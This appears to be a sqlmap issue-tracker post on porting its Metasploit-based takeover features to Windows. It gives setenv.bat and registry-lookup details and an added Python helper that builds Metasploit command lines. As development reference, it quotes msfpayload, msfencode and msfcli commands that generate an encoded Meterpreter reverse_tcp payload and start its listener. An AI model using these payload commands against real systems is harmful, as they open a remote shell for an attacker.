sqlmap
Out-of-band takeover features need to work also on Windows
Now that Metasploit properly runs on Windows too (without Cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, the --os-pwn/--os-smbrelay/--os-smb code needs to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.
Sample run:
C:\metasploit>scripts\setenv.bat
C:\metasploit\msf3>ruby msfpayload
Sample generic one-liner run:
<metasploit_install_dir>\scripts\setenv.bat & ruby <metasploit_install_dir>\msf3\msfpayload
Installation directory registry location:
"HKEY_LOCAL_MACHINE"\"SOFTWARE\Rapid7\Metasploit"\"Location"
import subprocess

IS_WIN = subprocess.mswindows  # Python 2: True when running on Windows

def _(key, value):
    # Read a value from HKEY_LOCAL_MACHINE; returns None off Windows or on any error
    retVal = None
    if IS_WIN:
        try:
            from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
            _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
            _ = OpenKey(_, key)
            retVal = QueryValueEx(_, value)[0]  # was 'retval', so the function always returned None
        except: # Pokemon Exception Handling
            pass
    return retVal

installDir = _(r"SOFTWARE\Rapid7\Metasploit", "Location")
Just for further reference for commands/forms which need to be supported:
/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 R | /usr/local/bin/msfencode -a x86 -e x86/alpha_mixed -o /home/stamparm/Dropbox/Work/sqlmap/output/192.168.21.129/tmpmcaro -t raw BufferRegister=EAX
/usr/local/bin/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 E
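As an added example (not sqlmap's code), this builds the Unix form of the msfpayload/msfencode/msfcli commands above and the Windows form from the setenv.bat one-liner, taking the install directory from the HKLM\SOFTWARE\Rapid7\Metasploit\Location key when available. Function names (getMsfInstallDir, buildMsfPipeline) are hypothetical; it uses Python 3's winreg and quotes install paths containing spaces, which the one-liner does not handle.

```python
import ntpath
import posixpath
import sys

# Constructed example (not sqlmap's code): helper names are hypothetical.
MSF_TOOLS = ("msfpayload", "msfencode", "msfcli")
UNIX_BIN_DIR = "/usr/local/bin"


def getMsfInstallDir():
    """Read HKLM\\SOFTWARE\\Rapid7\\Metasploit\\Location; None off Windows or if unset."""
    try:
        import winreg  # Python 3 name of the Python 2 _winreg module
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Rapid7\Metasploit") as key:
            return winreg.QueryValueEx(key, "Location")[0]
    except OSError:  # key or value missing, or access denied
        return None


def _quoteWin(path):
    # cmd.exe needs double quotes around paths containing spaces (e.g. C:\Program Files\...)
    return '"%s"' % path if " " in path else path


def buildMsfPipeline(stages, installDir=None, isWin=sys.platform.startswith("win")):
    """Build one shell command line for a pipeline of Metasploit tools.

    stages: list of (tool, [args]) in pipe order, e.g. msfpayload | msfencode.
    Unix form:    /usr/local/bin/<tool> args | /usr/local/bin/<tool> args
    Windows form: <dir>\\scripts\\setenv.bat & ruby <dir>\\msf3\\<tool> args | ruby ...
    setenv.bat runs once; the variables it sets persist for the rest of the line.
    """
    for tool, _args in stages:
        if tool not in MSF_TOOLS:
            raise ValueError("unsupported Metasploit tool: %s" % tool)
    if not isWin:
        return " | ".join("%s %s" % (posixpath.join(UNIX_BIN_DIR, tool), " ".join(args))
                          for tool, args in stages)
    if not installDir:
        raise RuntimeError("Metasploit install dir unknown (registry lookup failed?)")
    setenv = _quoteWin(ntpath.join(installDir, "scripts", "setenv.bat"))
    cmds = ["ruby %s %s" % (_quoteWin(ntpath.join(installDir, "msf3", tool)), " ".join(args))
            for tool, args in stages]
    return "%s & %s" % (setenv, " | ".join(cmds))
```

On a Windows host `buildMsfPipeline(stages, getMsfInstallDir(), True)` yields the one-liner form; the same `stages` list produces the /usr/local/bin form elsewhere.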
Consider rewriting the Metasploit integration to interact with the Metasploit RPC interface (msfrpcd) instead of wrapping the msfconsole/msfpayload/msfencode executables.